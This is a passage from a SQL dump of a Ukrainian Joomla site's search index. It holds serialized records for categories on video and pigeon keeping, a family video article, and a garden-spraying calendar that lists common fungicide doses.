17:51:31\";s:11:\"modified_by\";s:1:\"0\";s:7:\"metakey\";s:0:\"\";s:8:\"metadesc\";s:0:\"\";s:8:\"metadata\";O:24:\"Joomla\\Registry\\Registry\":3:{s:7:\"\0*\0data\";O:8:\"stdClass\":2:{s:6:\"author\";s:0:\"\";s:6:\"robots\";s:0:\"\";}s:14:\"\0*\0initialized\";b:1;s:9:\"separator\";s:1:\".\";}s:3:\"lft\";s:3:\"173\";s:9:\"parent_id\";s:1:\"1\";s:5:\"level\";s:1:\"1\";s:6:\"params\";O:24:\"Joomla\\Registry\\Registry\":3:{s:7:\"\0*\0data\";O:8:\"stdClass\":3:{s:15:\"category_layout\";s:0:\"\";s:5:\"image\";s:0:\"\";s:9:\"image_alt\";s:0:\"\";}s:14:\"\0*\0initialized\";b:1;s:9:\"separator\";s:1:\".\";}s:4:\"slug\";s:17:\"133:foto-ta-video\";s:6:\"layout\";s:8:\"category\";s:10:\"metaauthor\";N;s:4:\"path\";s:28:\"/index.php/133-foto-ta-video\";}s:15:\"\0*\0instructions\";a:5:{i:1;a:3:{i:0;s:5:\"title\";i:1;s:8:\"subtitle\";i:2;s:2:\"id\";}i:2;a:2:{i:0;s:7:\"summary\";i:1;s:4:\"body\";}i:3;a:8:{i:0;s:4:\"meta\";i:1;s:10:\"list_price\";i:2;s:10:\"sale_price\";i:3;s:4:\"link\";i:4;s:7:\"metakey\";i:5;s:8:\"metadesc\";i:6;s:10:\"metaauthor\";i:7;s:6:\"author\";}i:4;a:2:{i:0;s:4:\"path\";i:1;s:5:\"alias\";}i:5;a:1:{i:0;s:8:\"comments\";}}s:11:\"\0*\0taxonomy\";a:2:{s:4:\"Type\";a:1:{s:8:\"Category\";O:27:\"Joomla\\CMS\\Object\\CMSObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:8:\"Category\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}s:8:\"Language\";a:1:{s:1:\"*\";O:27:\"Joomla\\CMS\\Object\\CMSObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:1:\"*\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}}s:3:\"url\";s:49:\"index.php?option=com_content&view=category&id=133\";s:5:\"route\";s:49:\"index.php?option=com_content&view=category&id=133\";s:5:\"title\";s:24:\"Фото та відео\";s:11:\"description\";s:1:\" \";s:9:\"published\";N;s:5:\"state\";i:1;s:6:\"access\";s:1:\"1\";s:8:\"language\";s:1:\"*\";s:18:\"publish_start_date\";s:19:\"0000-00-00 00:00:00\";s:16:\"publish_end_date\";s:19:\"0000-00-00 00:00:00\";s:10:\"start_date\";s:19:\"2020-08-30 17:51:31\";s:8:\"end_date\";s:19:\"0000-00-00 00:00:00\";s:10:\"list_price\";N;s:10:\"sale_price\";N;s:7:\"type_id\";i:2;s:15:\"defaultLanguage\";s:5:\"uk-UA\";}'),(4592,'index.php?option=com_content&view=category&id=134','index.php?option=com_content&view=category&id=134','Відео',' ','2020-08-30 20:52:27','f464f7e2459f618979a2acfd940bba6b',1,1,1,'*','0000-00-00 00:00:00','0000-00-00 00:00:00','2020-08-30 17:52:27','0000-00-00 00:00:00',0,0,2,_binary 'O:19:\"FinderIndexerResult\":19:{s:11:\"\0*\0elements\";a:18:{s:2:\"id\";s:3:\"134\";s:5:\"alias\";s:5:\"video\";s:7:\"summary\";s:1:\"	\";s:9:\"extension\";s:11:\"com_content\";s:10:\"created_by\";s:3:\"430\";s:8:\"modified\";s:19:\"2020-08-30 17:52:27\";s:11:\"modified_by\";s:1:\"0\";s:7:\"metakey\";s:0:\"\";s:8:\"metadesc\";s:0:\"\";s:8:\"metadata\";O:24:\"Joomla\\Registry\\Registry\":3:{s:7:\"\0*\0data\";O:8:\"stdClass\":2:{s:6:\"author\";s:0:\"\";s:6:\"robots\";s:0:\"\";}s:14:\"\0*\0initialized\";b:1;s:9:\"separator\";s:1:\".\";}s:3:\"lft\";s:3:\"174\";s:9:\"parent_id\";s:3:\"133\";s:5:\"level\";s:1:\"2\";s:6:\"params\";O:24:\"Joomla\\Registry\\Registry\":3:{s:7:\"\0*\0data\";O:8:\"stdClass\":3:{s:15:\"category_layout\";s:0:\"\";s:5:\"image\";s:0:\"\";s:9:\"image_alt\";s:0:\"\";}s:14:\"\0*\0initialized\";b:1;s:9:\"separator\";s:1:\".\";}s:4:\"slug\";s:9:\"134:video\";s:6:\"layout\";s:8:\"category\";s:10:\"metaauthor\";N;s:4:\"path\";s:34:\"/index.php/134-foto-ta-video/video\";}s:15:\"\0*\0instructions\";a:5:{i:1;a:3:{i:0;s:5:\"title\";i:1;s:8:\"subtitle\";i:2;s:2:\"id\";}i:2;a:2:{i:0;s:7:\"summary\";i:1;s:4:\"body\";}i:3;a:8:{i:0;s:4:\"meta\";i:1;s:10:\"list_price\";i:2;s:10:\"sale_price\";i:3;s:4:\"link\";i:4;s:7:\"metakey\";i:5;s:8:\"metadesc\";i:6;s:10:\"metaauthor\";i:7;s:6:\"author\";}i:4;a:2:{i:0;s:4:\"path\";i:1;s:5:\"alias\";}i:5;a:1:{i:0;s:8:\"comments\";}}s:11:\"\0*\0taxonomy\";a:2:{s:4:\"Type\";a:1:{s:8:\"Category\";O:27:\"Joomla\\CMS\\Object\\CMSObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:8:\"Category\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}s:8:\"Language\";a:1:{s:1:\"*\";O:27:\"Joomla\\CMS\\Object\\CMSObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:1:\"*\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}}s:3:\"url\";s:49:\"index.php?option=com_content&view=category&id=134\";s:5:\"route\";s:49:\"index.php?option=com_content&view=category&id=134\";s:5:\"title\";s:10:\"Відео\";s:11:\"description\";s:1:\" \";s:9:\"published\";N;s:5:\"state\";i:1;s:6:\"access\";s:1:\"1\";s:8:\"language\";s:1:\"*\";s:18:\"publish_start_date\";s:19:\"0000-00-00 00:00:00\";s:16:\"publish_end_date\";s:19:\"0000-00-00 00:00:00\";s:10:\"start_date\";s:19:\"2020-08-30 17:52:27\";s:8:\"end_date\";s:19:\"0000-00-00 00:00:00\";s:10:\"list_price\";N;s:10:\"sale_price\";N;s:7:\"type_id\";i:2;s:15:\"defaultLanguage\";s:5:\"uk-UA\";}'),(4593,'index.php?option=com_content&view=article&id=2456','index.php?option=com_content&view=article&id=2456:protsik-illya-dmitrovich-mij-didus-znav-sekret-dovgolittya-ta-lyubiv-rozpovidati-narodni-bajki&catid=134','Процик Ілля Дмитрович - мій дідусь, знав секрет довголіття та любив розповідати народні байки',' ','2020-08-30 20:57:59','4e331fef98fe62889b965ed70c7e45bf',1,1,1,'*','2020-08-30 17:57:59','0000-00-00 00:00:00','2020-08-30 17:57:59','0000-00-00 00:00:00',0,0,4,_binary 'O:19:\"FinderIndexerResult\":19:{s:11:\"\0*\0elements\";a:26:{s:2:\"id\";s:4:\"2456\";s:5:\"alias\";s:94:\"protsik-illya-dmitrovich-mij-didus-znav-sekret-dovgolittya-ta-lyubiv-rozpovidati-narodni-bajki\";s:7:\"summary\";s:200:\"<p><span contenteditable=\"false\" class=\"f-video-editor fr-fvn fr-tnv\"><iframe width=\"640\" height=\"360\" src=\"//www.youtube.com/embed/MtgeGi_sDSw\" frameborder=\"0\" allowfullscreen=\"\"></iframe></span></p>\";s:4:\"body\";s:0:\"\";s:6:\"images\";s:173:\"{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}\";s:5:\"catid\";s:3:\"134\";s:10:\"created_by\";s:3:\"430\";s:16:\"created_by_alias\";s:0:\"\";s:8:\"modified\";s:19:\"2020-08-30 17:57:59\";s:11:\"modified_by\";s:1:\"0\";s:6:\"params\";O:24:\"Joomla\\Registry\\Registry\":3:{s:7:\"\0*\0data\";O:8:\"stdClass\":84:{s:14:\"article_layout\";s:9:\"_:default\";s:10:\"show_title\";s:1:\"1\";s:11:\"link_titles\";s:1:\"1\";s:10:\"show_intro\";s:1:\"1\";s:19:\"info_block_position\";s:1:\"0\";s:21:\"info_block_show_title\";s:1:\"1\";s:13:\"show_category\";s:1:\"1\";s:13:\"link_category\";s:1:\"1\";s:20:\"show_parent_category\";s:1:\"1\";s:20:\"link_parent_category\";s:1:\"0\";s:17:\"show_associations\";s:1:\"0\";s:5:\"flags\";s:1:\"1\";s:11:\"show_author\";s:1:\"0\";s:11:\"link_author\";s:1:\"0\";s:16:\"show_create_date\";s:1:\"0\";s:16:\"show_modify_date\";s:1:\"0\";s:17:\"show_publish_date\";s:1:\"1\";s:20:\"show_item_navigation\";s:1:\"1\";s:9:\"show_vote\";s:1:\"0\";s:13:\"show_readmore\";s:1:\"1\";s:19:\"show_readmore_title\";s:1:\"1\";s:14:\"readmore_limit\";s:2:\"80\";s:9:\"show_tags\";s:1:\"1\";s:10:\"show_icons\";s:1:\"1\";s:15:\"show_print_icon\";s:1:\"1\";s:15:\"show_email_icon\";s:1:\"0\";s:9:\"show_hits\";s:1:\"1\";s:11:\"show_noauth\";s:1:\"1\";s:13:\"urls_position\";s:1:\"0\";s:7:\"captcha\";s:1:\"0\";s:23:\"show_publishing_options\";s:1:\"1\";s:20:\"show_article_options\";s:1:\"1\";s:12:\"save_history\";s:1:\"0\";s:13:\"history_limit\";i:10;s:25:\"show_urls_images_frontend\";s:1:\"0\";s:24:\"show_urls_images_backend\";s:1:\"1\";s:7:\"targeta\";i:0;s:7:\"targetb\";i:0;s:7:\"targetc\";i:0;s:11:\"float_intro\";s:4:\"left\";s:14:\"float_fulltext\";s:4:\"left\";s:15:\"category_layout\";s:6:\"_:blog\";s:32:\"show_category_heading_title_text\";s:1:\"1\";s:19:\"show_category_title\";s:1:\"0\";s:16:\"show_description\";s:1:\"0\";s:22:\"show_description_image\";s:1:\"0\";s:8:\"maxLevel\";s:1:\"1\";s:21:\"show_empty_categories\";s:1:\"0\";s:16:\"show_no_articles\";s:1:\"1\";s:16:\"show_subcat_desc\";s:1:\"1\";s:21:\"show_cat_num_articles\";s:1:\"0\";s:13:\"show_cat_tags\";s:1:\"1\";s:21:\"show_base_description\";s:1:\"1\";s:11:\"maxLevelcat\";s:2:\"-1\";s:25:\"show_empty_categories_cat\";s:1:\"0\";s:20:\"show_subcat_desc_cat\";s:1:\"1\";s:25:\"show_cat_num_articles_cat\";s:1:\"1\";s:20:\"num_leading_articles\";s:1:\"1\";s:18:\"num_intro_articles\";s:1:\"6\";s:11:\"num_columns\";s:1:\"1\";s:9:\"num_links\";s:1:\"0\";s:18:\"multi_column_order\";s:1:\"0\";s:24:\"show_subcategory_content\";s:1:\"0\";s:21:\"show_pagination_limit\";s:1:\"1\";s:12:\"filter_field\";s:4:\"hide\";s:13:\"show_headings\";s:1:\"1\";s:14:\"list_show_date\";s:1:\"0\";s:11:\"date_format\";s:0:\"\";s:14:\"list_show_hits\";s:1:\"1\";s:16:\"list_show_author\";s:1:\"0\";s:15:\"list_show_votes\";s:1:\"0\";s:17:\"list_show_ratings\";s:1:\"0\";s:11:\"orderby_pri\";s:5:\"order\";s:11:\"orderby_sec\";s:5:\"rdate\";s:10:\"order_date\";s:9:\"published\";s:15:\"show_pagination\";s:1:\"1\";s:23:\"show_pagination_results\";s:1:\"1\";s:13:\"show_featured\";s:4:\"show\";s:14:\"show_feed_link\";s:1:\"1\";s:12:\"feed_summary\";s:1:\"0\";s:18:\"feed_show_readmore\";s:1:\"1\";s:12:\"sef_advanced\";i:0;s:7:\"sef_ids\";i:0;s:20:\"custom_fields_enable\";s:1:\"1\";}s:14:\"\0*\0initialized\";b:1;s:9:\"separator\";s:1:\".\";}s:7:\"metakey\";s:0:\"\";s:8:\"metadesc\";s:0:\"\";s:8:\"metadata\";O:24:\"Joomla\\Registry\\Registry\":3:{s:7:\"\0*\0data\";O:8:\"stdClass\":4:{s:6:\"robots\";s:0:\"\";s:6:\"author\";s:0:\"\";s:6:\"rights\";s:0:\"\";s:10:\"xreference\";s:0:\"\";}s:14:\"\0*\0initialized\";b:1;s:9:\"separator\";s:1:\".\";}s:7:\"version\";s:1:\"1\";s:8:\"ordering\";s:1:\"0\";s:8:\"category\";s:10:\"Відео\";s:9:\"cat_state\";s:1:\"1\";s:10:\"cat_access\";s:1:\"1\";s:4:\"slug\";s:99:\"2456:protsik-illya-dmitrovich-mij-didus-znav-sekret-dovgolittya-ta-lyubiv-rozpovidati-narodni-bajki\";s:7:\"catslug\";s:9:\"134:video\";s:6:\"author\";s:10:\"Super User\";s:6:\"layout\";s:7:\"article\";s:7:\"context\";s:19:\"com_content.article\";s:4:\"path\";s:134:\"/index.php/134-foto-ta-video/video/2456-protsik-illya-dmitrovich-mij-didus-znav-sekret-dovgolittya-ta-lyubiv-rozpovidati-narodni-bajki\";s:10:\"metaauthor\";N;}s:15:\"\0*\0instructions\";a:5:{i:1;a:3:{i:0;s:5:\"title\";i:1;s:8:\"subtitle\";i:2;s:2:\"id\";}i:2;a:2:{i:0;s:7:\"summary\";i:1;s:4:\"body\";}i:3;a:8:{i:0;s:4:\"meta\";i:1;s:10:\"list_price\";i:2;s:10:\"sale_price\";i:3;s:7:\"metakey\";i:4;s:8:\"metadesc\";i:5;s:10:\"metaauthor\";i:6;s:6:\"author\";i:7;s:16:\"created_by_alias\";}i:4;a:2:{i:0;s:4:\"path\";i:1;s:5:\"alias\";}i:5;a:1:{i:0;s:8:\"comments\";}}s:11:\"\0*\0taxonomy\";a:4:{s:4:\"Type\";a:1:{s:7:\"Article\";O:27:\"Joomla\\CMS\\Object\\CMSObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:7:\"Article\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}s:6:\"Author\";a:1:{s:10:\"Super User\";O:27:\"Joomla\\CMS\\Object\\CMSObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:10:\"Super User\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}s:8:\"Category\";a:1:{s:10:\"Відео\";O:27:\"Joomla\\CMS\\Object\\CMSObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:10:\"Відео\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}s:8:\"Language\";a:1:{s:1:\"*\";O:27:\"Joomla\\CMS\\Object\\CMSObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:1:\"*\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}}s:3:\"url\";s:49:\"index.php?option=com_content&view=article&id=2456\";s:5:\"route\";s:154:\"index.php?option=com_content&view=article&id=2456:protsik-illya-dmitrovich-mij-didus-znav-sekret-dovgolittya-ta-lyubiv-rozpovidati-narodni-bajki&catid=134\";s:5:\"title\";s:171:\"Процик Ілля Дмитрович - мій дідусь, знав секрет довголіття та любив розповідати народні байки\";s:11:\"description\";s:1:\" \";s:9:\"published\";N;s:5:\"state\";i:1;s:6:\"access\";s:1:\"1\";s:8:\"language\";s:1:\"*\";s:18:\"publish_start_date\";s:19:\"2020-08-30 17:57:59\";s:16:\"publish_end_date\";s:19:\"0000-00-00 00:00:00\";s:10:\"start_date\";s:19:\"2020-08-30 17:57:59\";s:8:\"end_date\";s:19:\"0000-00-00 00:00:00\";s:10:\"list_price\";N;s:10:\"sale_price\";N;s:7:\"type_id\";i:4;s:15:\"defaultLanguage\";s:5:\"uk-UA\";}'),(4594,'index.php?option=com_content&view=article&id=2454','index.php?option=com_content&view=article&id=2454:kalendarnij-plan-doglyadu-za-sadom&catid=123','Календарний план догляду за садом',' Користуюсь більше п\'яти років. Велика перевага даного календарного плану: - препарати розраховано на 10 літрів води ( типовий бачок для оприскування); - препарати сумісні для змішування; - препарати поширені та доступні в торгівельній мережі; - норми внесення препаратів подано: назва препарату та відповідно до черговості в переліку кількість. Наприклад: ','2020-08-31 20:06:49','8abff3e463376e73f05811a9e14f059e',1,1,1,'*','2020-08-30 15:12:49','0000-00-00 00:00:00','2020-08-30 15:12:49','0000-00-00 00:00:00',0,0,4,_binary 'O:19:\"FinderIndexerResult\":19:{s:11:\"\0*\0elements\";a:26:{s:2:\"id\";s:4:\"2454\";s:5:\"alias\";s:34:\"kalendarnij-plan-doglyadu-za-sadom\";s:7:\"summary\";s:1416:\"<p style=\"text-align: left;\"><span style=\"font-family: Times New Roman,Times; font-size: 16px;\"><strong><a class=\"modal\" href=\"https://malehus.in.ua/images/stories/sad_chereshn.jpg\"><img alt=\"\" class=\"fr-fil fr-dii\" src=\"https://malehus.in.ua/images/stories/sad_chereshn.jpg\"></a>Користуюсь більше п\'яти років. Велика перевага даного календарного плану:</strong></span></p><p><span style=\"font-family: Times New Roman,Times; font-size: 16px;\"><strong> - препарати розраховано на 10 літрів води ( типовий бачок для оприскування);</strong></span></p><p><span style=\"font-family: Times New Roman,Times; font-size: 16px;\"><strong>- препарати сумісні для&nbsp; змішування;</strong></span></p><p><span style=\"font-family: Times New Roman,Times; font-size: 16px;\"><strong>- препарати поширені та доступні в торгівельній мережі;</strong></span></p><p><span style=\"font-family: Times New Roman,Times; font-size: 16px;\"><strong>- норми внесення препаратів подано: назва препарату та відповідно до черговості в переліку кількість. </strong></span></p><p><span style=\"font-family: Times New Roman,Times; font-size: 16px;\">Наприклад:&nbsp;\";s:4:\"body\";s:380:\"</span></p><p>&nbsp;<strong>Матч 050  ЕС + Скор 250 ЕС + Хорус 75 WG + Тиовид Джет 80WG<br>  (8 мл +&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;2 мл +&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;3 гр +&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; 50 гр)&nbsp; &nbsp;</strong></p>\";s:6:\"images\";s:173:\"{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}\";s:5:\"catid\";s:3:\"123\";s:10:\"created_by\";s:3:\"430\";s:16:\"created_by_alias\";s:0:\"\";s:8:\"modified\";s:19:\"2020-08-31 17:06:49\";s:11:\"modified_by\";s:3:\"430\";s:6:\"params\";O:24:\"Joomla\\Registry\\Registry\":3:{s:7:\"\0*\0data\";O:8:\"stdClass\":84:{s:14:\"article_layout\";s:9:\"_:default\";s:10:\"show_title\";s:1:\"1\";s:11:\"link_titles\";s:1:\"1\";s:10:\"show_intro\";s:1:\"1\";s:19:\"info_block_position\";s:1:\"0\";s:21:\"info_block_show_title\";s:1:\"1\";s:13:\"show_category\";s:1:\"1\";s:13:\"link_category\";s:1:\"1\";s:20:\"show_parent_category\";s:1:\"1\";s:20:\"link_parent_category\";s:1:\"0\";s:17:\"show_associations\";s:1:\"0\";s:5:\"flags\";s:1:\"1\";s:11:\"show_author\";s:1:\"0\";s:11:\"link_author\";s:1:\"0\";s:16:\"show_create_date\";s:1:\"0\";s:16:\"show_modify_date\";s:1:\"0\";s:17:\"show_publish_date\";s:1:\"1\";s:20:\"show_item_navigation\";s:1:\"1\";s:9:\"show_vote\";s:1:\"0\";s:13:\"show_readmore\";s:1:\"1\";s:19:\"show_readmore_title\";s:1:\"1\";s:14:\"readmore_limit\";s:2:\"80\";s:9:\"show_tags\";s:1:\"1\";s:10:\"show_icons\";s:1:\"1\";s:15:\"show_print_icon\";s:1:\"1\";s:15:\"show_email_icon\";s:1:\"0\";s:9:\"show_hits\";s:1:\"1\";s:11:\"show_noauth\";s:1:\"1\";s:13:\"urls_position\";s:1:\"0\";s:7:\"captcha\";s:1:\"0\";s:23:\"show_publishing_options\";s:1:\"1\";s:20:\"show_article_options\";s:1:\"1\";s:12:\"save_history\";s:1:\"0\";s:13:\"history_limit\";i:10;s:25:\"show_urls_images_frontend\";s:1:\"0\";s:24:\"show_urls_images_backend\";s:1:\"1\";s:7:\"targeta\";i:0;s:7:\"targetb\";i:0;s:7:\"targetc\";i:0;s:11:\"float_intro\";s:4:\"left\";s:14:\"float_fulltext\";s:4:\"left\";s:15:\"category_layout\";s:6:\"_:blog\";s:32:\"show_category_heading_title_text\";s:1:\"1\";s:19:\"show_category_title\";s:1:\"0\";s:16:\"show_description\";s:1:\"0\";s:22:\"show_description_image\";s:1:\"0\";s:8:\"maxLevel\";s:1:\"1\";s:21:\"show_empty_categories\";s:1:\"0\";s:16:\"show_no_articles\";s:1:\"1\";s:16:\"show_subcat_desc\";s:1:\"1\";s:21:\"show_cat_num_articles\";s:1:\"0\";s:13:\"show_cat_tags\";s:1:\"1\";s:21:\"show_base_description\";s:1:\"1\";s:11:\"maxLevelcat\";s:2:\"-1\";s:25:\"show_empty_categories_cat\";s:1:\"0\";s:20:\"show_subcat_desc_cat\";s:1:\"1\";s:25:\"show_cat_num_articles_cat\";s:1:\"1\";s:20:\"num_leading_articles\";s:1:\"1\";s:18:\"num_intro_articles\";s:1:\"6\";s:11:\"num_columns\";s:1:\"1\";s:9:\"num_links\";s:1:\"0\";s:18:\"multi_column_order\";s:1:\"0\";s:24:\"show_subcategory_content\";s:1:\"0\";s:21:\"show_pagination_limit\";s:1:\"1\";s:12:\"filter_field\";s:4:\"hide\";s:13:\"show_headings\";s:1:\"1\";s:14:\"list_show_date\";s:1:\"0\";s:11:\"date_format\";s:0:\"\";s:14:\"list_show_hits\";s:1:\"1\";s:16:\"list_show_author\";s:1:\"0\";s:15:\"list_show_votes\";s:1:\"0\";s:17:\"list_show_ratings\";s:1:\"0\";s:11:\"orderby_pri\";s:5:\"order\";s:11:\"orderby_sec\";s:5:\"rdate\";s:10:\"order_date\";s:9:\"published\";s:15:\"show_pagination\";s:1:\"1\";s:23:\"show_pagination_results\";s:1:\"1\";s:13:\"show_featured\";s:4:\"show\";s:14:\"show_feed_link\";s:1:\"1\";s:12:\"feed_summary\";s:1:\"0\";s:18:\"feed_show_readmore\";s:1:\"1\";s:12:\"sef_advanced\";i:0;s:7:\"sef_ids\";i:0;s:20:\"custom_fields_enable\";s:1:\"1\";}s:14:\"\0*\0initialized\";b:1;s:9:\"separator\";s:1:\".\";}s:7:\"metakey\";s:0:\"\";s:8:\"metadesc\";s:0:\"\";s:8:\"metadata\";O:24:\"Joomla\\Registry\\Registry\":3:{s:7:\"\0*\0data\";O:8:\"stdClass\":4:{s:6:\"robots\";s:0:\"\";s:6:\"author\";s:0:\"\";s:6:\"rights\";s:0:\"\";s:10:\"xreference\";s:0:\"\";}s:14:\"\0*\0initialized\";b:1;s:9:\"separator\";s:1:\".\";}s:7:\"version\";s:1:\"9\";s:8:\"ordering\";s:1:\"0\";s:8:\"category\";s:27:\"Засоби захисту\";s:9:\"cat_state\";s:1:\"1\";s:10:\"cat_access\";s:1:\"1\";s:4:\"slug\";s:39:\"2454:kalendarnij-plan-doglyadu-za-sadom\";s:7:\"catslug\";s:19:\"123:zasoby-zakhystu\";s:6:\"author\";s:10:\"Super User\";s:6:\"layout\";s:7:\"article\";s:7:\"context\";s:19:\"com_content.article\";s:4:\"path\";s:79:\"/index.php/sadivnytstvo/zasoby-zakhystu/2454-kalendarnij-plan-doglyadu-za-sadom\";s:10:\"metaauthor\";N;}s:15:\"\0*\0instructions\";a:5:{i:1;a:3:{i:0;s:5:\"title\";i:1;s:8:\"subtitle\";i:2;s:2:\"id\";}i:2;a:2:{i:0;s:7:\"summary\";i:1;s:4:\"body\";}i:3;a:8:{i:0;s:4:\"meta\";i:1;s:10:\"list_price\";i:2;s:10:\"sale_price\";i:3;s:7:\"metakey\";i:4;s:8:\"metadesc\";i:5;s:10:\"metaauthor\";i:6;s:6:\"author\";i:7;s:16:\"created_by_alias\";}i:4;a:2:{i:0;s:4:\"path\";i:1;s:5:\"alias\";}i:5;a:1:{i:0;s:8:\"comments\";}}s:11:\"\0*\0taxonomy\";a:4:{s:4:\"Type\";a:1:{s:7:\"Article\";O:27:\"Joomla\\CMS\\Object\\CMSObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:7:\"Article\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}s:6:\"Author\";a:1:{s:10:\"Super User\";O:27:\"Joomla\\CMS\\Object\\CMSObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:10:\"Super User\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}s:8:\"Category\";a:1:{s:27:\"Засоби захисту\";O:27:\"Joomla\\CMS\\Object\\CMSObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:27:\"Засоби захисту\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}s:8:\"Language\";a:1:{s:1:\"*\";O:27:\"Joomla\\CMS\\Object\\CMSObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:1:\"*\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}}s:3:\"url\";s:49:\"index.php?option=com_content&view=article&id=2454\";s:5:\"route\";s:94:\"index.php?option=com_content&view=article&id=2454:kalendarnij-plan-doglyadu-za-sadom&catid=123\";s:5:\"title\";s:62:\"Календарний план догляду за садом\";s:11:\"description\";s:647:\" Користуюсь більше п\'яти років. Велика перевага даного календарного плану: - препарати розраховано на 10 літрів води ( типовий бачок для оприскування); - препарати сумісні для змішування; - препарати поширені та доступні в торгівельній мережі; - норми внесення препаратів подано: назва препарату та відповідно до черговості в переліку кількість. Наприклад: \";s:9:\"published\";N;s:5:\"state\";i:1;s:6:\"access\";s:1:\"1\";s:8:\"language\";s:1:\"*\";s:18:\"publish_start_date\";s:19:\"2020-08-30 15:12:49\";s:16:\"publish_end_date\";s:19:\"0000-00-00 00:00:00\";s:10:\"start_date\";s:19:\"2020-08-30 15:12:49\";s:8:\"end_date\";s:19:\"0000-00-00 00:00:00\";s:10:\"list_price\";N;s:10:\"sale_price\";N;s:7:\"type_id\";i:4;s:15:\"defaultLanguage\";s:5:\"uk-UA\";}'),(4595,'index.php?option=com_content&view=category&id=135','index.php?option=com_content&view=category&id=135','Інформація голубівникам',' ','2020-09-02 09:28:31','8f135a2f657f8edfef4ca434df22fe65',1,1,1,'*','0000-00-00 00:00:00','0000-00-00 00:00:00','2020-09-02 06:28:31','0000-00-00 00:00:00',0,0,2,_binary 'O:19:\"FinderIndexerResult\":19:{s:11:\"\0*\0elements\";a:18:{s:2:\"id\";s:3:\"135\";s:5:\"alias\";s:25:\"informatsiia-holubivnykam\";s:7:\"summary\";s:1:\"	\";s:9:\"extension\";s:11:\"com_content\";s:10:\"created_by\";s:3:\"430\";s:8:\"modified\";s:19:\"2020-09-02 06:28:31\";s:11:\"modified_by\";s:1:\"0\";s:7:\"metakey\";s:0:\"\";s:8:\"metadesc\";s:0:\"\";s:8:\"metadata\";O:24:\"Joomla\\Registry\\Registry\":3:{s:7:\"\0*\0data\";O:8:\"stdClass\":2:{s:6:\"author\";s:0:\"\";s:6:\"robots\";s:0:\"\";}s:14:\"\0*\0initialized\";b:1;s:9:\"separator\";s:1:\".\";}s:3:\"lft\";s:3:\"164\";s:9:\"parent_id\";s:3:\"125\";s:5:\"level\";s:1:\"2\";s:6:\"params\";O:24:\"Joomla\\Registry\\Registry\":3:{s:7:\"\0*\0data\";O:8:\"stdClass\":3:{s:15:\"category_layout\";s:0:\"\";s:5:\"image\";s:0:\"\";s:9:\"image_alt\";s:0:\"\";}s:14:\"\0*\0initialized\";b:1;s:9:\"separator\";s:1:\".\";}s:4:\"slug\";s:29:\"135:informatsiia-holubivnykam\";s:6:\"layout\";s:8:\"category\";s:10:\"metaauthor\";N;s:4:\"path\";s:47:\"/index.php/holuby/135-informatsiia-holubivnykam\";}s:15:\"\0*\0instructions\";a:5:{i:1;a:3:{i:0;s:5:\"title\";i:1;s:8:\"subtitle\";i:2;s:2:\"id\";}i:2;a:2:{i:0;s:7:\"summary\";i:1;s:4:\"body\";}i:3;a:8:{i:0;s:4:\"meta\";i:1;s:10:\"list_price\";i:2;s:10:\"sale_price\";i:3;s:4:\"link\";i:4;s:7:\"metakey\";i:5;s:8:\"metadesc\";i:6;s:10:\"metaauthor\";i:7;s:6:\"author\";}i:4;a:2:{i:0;s:4:\"path\";i:1;s:5:\"alias\";}i:5;a:1:{i:0;s:8:\"comments\";}}s:11:\"\0*\0taxonomy\";a:2:{s:4:\"Type\";a:1:{s:8:\"Category\";O:27:\"Joomla\\CMS\\Object\\CMSObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:8:\"Category\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}s:8:\"Language\";a:1:{s:1:\"*\";O:27:\"Joomla\\CMS\\Object\\CMSObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:1:\"*\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}}s:3:\"url\";s:49:\"index.php?option=com_content&view=category&id=135\";s:5:\"route\";s:49:\"index.php?option=com_content&view=category&id=135\";s:5:\"title\";s:45:\"Інформація голубівникам\";s:11:\"description\";s:1:\" \";s:9:\"published\";N;s:5:\"state\";i:1;s:6:\"access\";s:1:\"1\";s:8:\"language\";s:1:\"*\";s:18:\"publish_start_date\";s:19:\"0000-00-00 00:00:00\";s:16:\"publish_end_date\";s:19:\"0000-00-00 00:00:00\";s:10:\"start_date\";s:19:\"2020-09-02 06:28:31\";s:8:\"end_date\";s:19:\"0000-00-00 